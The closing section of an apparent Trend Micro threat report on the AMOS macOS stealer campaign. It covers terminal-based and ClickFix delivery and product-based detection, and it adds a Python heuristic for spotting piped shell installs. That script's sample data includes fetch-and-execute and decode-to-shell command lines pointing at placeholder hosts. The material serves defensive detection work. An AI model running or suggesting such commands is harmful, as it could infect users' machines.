TrendMicro

An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via ‘Cracked’ Apps

Conclusion

Our analysis revealed a sophisticated multistage attack that relies on social engineering to trick victims, uses domain rotation techniques to evade detection, and employs adaptive delivery methods to increase the chance of infecting the system. These highlight the importance of comprehensive endpoint detection and response capabilities that can correlate behaviors across different attack stages (initial execution, persistence, and data exfiltration) and flag suspicious activity proactively.

The AMOS campaign also demonstrates significant tactical adaptation in response to Apple’s security improvements. While macOS Sequoia’s enhanced Gatekeeper protections successfully blocked traditional .dmg-based infections, threat actors quickly pivoted to terminal-based installation methods that proved more effective in bypassing security controls. This shift highlights the importance of defense-in-depth strategies that don’t rely solely on built-in operating system protections.

Telemetry and workbench capabilities in Trend Vision One provided deep forensic analysis of the attack chain, from initial compromise to data exfiltration. This visibility allowed the security team to understand not just what happened, but how the attack progressed and what data was potentially exposed. This kind of visibility is critical for organizations, because it provides actionable knowledge. It supports incident response by showing what was or could be compromised, strengthens defenses by highlighting the techniques that need closer monitoring, and informs user awareness by revealing where employees are most likely to be tricked by social engineering tactics.

AMOS and similar threats will continue leaning on social engineering instead of relying on technical attacks. This could include the heavy use of malvertising on legitimate platforms like Google Ads as well as search engine optimization (SEO) poisoning to push fake installers to the top of search results. While these sites don’t always perfectly mirror legitimate pages, they might be convincing enough to mislead users who trust search rankings or act without checking the source.

Attackers may continue to abuse living-off-the-land binaries (LOLBins) on macOS, such as osascript, curl, and AppleScript. Attackers may also use stronger obfuscation to evade detection and attempt to bypass Apple’s security features, including Gatekeeper, perhaps using stolen or fake developer certificates.

Another method seen recently is the use of fake CAPTCHAs or “ClickFix” campaigns. Here, users are prompted with a supposed “human verification” step that instructs them to copy and paste a malicious command into their macOS Terminal. Doing so bypasses macOS’s built-in security features, such as Gatekeeper. By shifting execution to the user, attackers reduce their effort while still increasing the likelihood of successful infection.
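The terminal-based installation and ClickFix patterns described above share a detection surface: a command line, launched from an interactive terminal, that pulls a remote or decoded script straight into a shell, or that drives osascript. The Python below is an added illustration of one such detection heuristic; it is not code from the original post or from Trend Micro. It assumes a hypothetical telemetry schema of (parent process name, command line) pairs and runs over a handful of constructed sample records, with placeholder `example.invalid` hosts standing in for any real infrastructure.

```python
import shlex
from os.path import basename

# Process names that, when they appear as a later pipeline stage, mean the
# preceding stage's output is being executed rather than saved or displayed.
SHELLS = {"bash", "sh", "zsh"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"base64", "xxd"}
# Parents that indicate a human (or a pasted ClickFix snippet) typed the command.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

# Constructed sample telemetry (hypothetical schema: parent name, command line).
# Hosts are placeholders; none of these records come from the original post.
SAMPLE_EVENTS = [
    ("Terminal", "curl -fsSL http://example.invalid/verify.sh | bash"),
    ("Terminal", "osascript -e 'display notification \"Verification complete\"'"),
    ("Terminal", "git pull origin main"),
    ("Terminal", "curl -sO https://example.invalid/report.pdf"),
    ("Finder", "open /Applications/Safari.app"),
    ("Terminal", "echo aGVsbG8= | base64 -d | sh"),
]


def pipeline_commands(cmdline):
    """Return the basename of the first token of each '|'-separated stage.

    shlex with punctuation_chars='|' splits on pipes even without surrounding
    whitespace while still honouring quotes, so 'osascript -e "..."' stays one
    stage. Malformed quoting falls back to a plain whitespace split.
    """
    try:
        lexer = shlex.shlex(cmdline, posix=True, punctuation_chars="|")
        lexer.whitespace_split = True
        tokens = list(lexer)
    except ValueError:
        tokens = cmdline.split()
    stages, current = [], []
    for tok in tokens:
        if tok == "|":
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return [basename(stage[0]) for stage in stages if stage]


def _feeds_a_shell(cmds, producers):
    """True if a producer stage is followed (anywhere later) by a shell stage."""
    for i, cmd in enumerate(cmds):
        if cmd in producers and any(later in SHELLS for later in cmds[i + 1:]):
            return True
    return False


def assess(parent, cmdline):
    """Return the list of heuristic reasons that apply to one record."""
    cmds = pipeline_commands(cmdline)
    reasons = []
    # Remote script executed without ever being written to disk: the shape of
    # a pasted ClickFix / terminal-installer command.
    if _feeds_a_shell(cmds, DOWNLOADERS):
        reasons.append("remote_script_piped_to_shell")
    # Obfuscated payload decoded in memory and handed to a shell.
    if _feeds_a_shell(cmds, DECODERS):
        reasons.append("decoded_payload_piped_to_shell")
    # osascript from an interactive terminal is common for admins, so it is
    # recorded as a low-confidence signal rather than an alert on its own.
    if "osascript" in cmds and parent in INTERACTIVE_PARENTS:
        reasons.append("osascript_from_interactive_terminal")
    return reasons


def triage(events):
    """Apply assess() to every record and return the flagged ones with severity."""
    findings = []
    for parent, cmdline in events:
        reasons = assess(parent, cmdline)
        if not reasons:
            continue
        severity = "high" if any(r.endswith("piped_to_shell") for r in reasons) else "low"
        findings.append({"parent": parent, "cmdline": cmdline,
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["severity"], finding["reasons"], finding["cmdline"])
```

Note that a bare download (`curl -sO ...`) is deliberately not flagged: the signal is the pipeline shape, not the presence of curl, which keeps the false-positive rate tolerable on developer machines where curl and git are everyday tools.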

MDR delivers round-the-clock monitoring, intelligent threat hunting, and swift incident response capabilities that identify and neutralize threats before they can cause substantial harm. Against sophisticated campaigns employing evasive techniques, fileless execution, and social engineering tactics, MDR excels by correlating real-time telemetry from endpoints, network infrastructure, and user activities into a unified threat picture. This comprehensive visibility enables security teams to spot subtle anomalies — from suspicious script execution sequences to irregular process behaviors — and execute immediate containment measures that disrupt attack progression at critical junctures.

Trend Vision One™ Threat Intelligence

To stay ahead of evolving threats, Trend Micro customers can access Trend Vision One™ Threat Insights, which provides the latest insights from Trend Research on emerging threats and threat actors.

Trend Vision One Threat Insights

Trend Vision One Intelligence Reports (IOC Sweeping)

Hunting Queries

Trend Vision One Search App

Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.

Atomic MacOS Stealer VSAPI Detection

malName: *.AMOS.* AND eventName: MALWARE_DETECTION

More hunting queries are available for Trend Vision One customers with Threat Insights entitlement enabled.

Indicators of Compromise

The indicators of compromise for this entry can be found here.
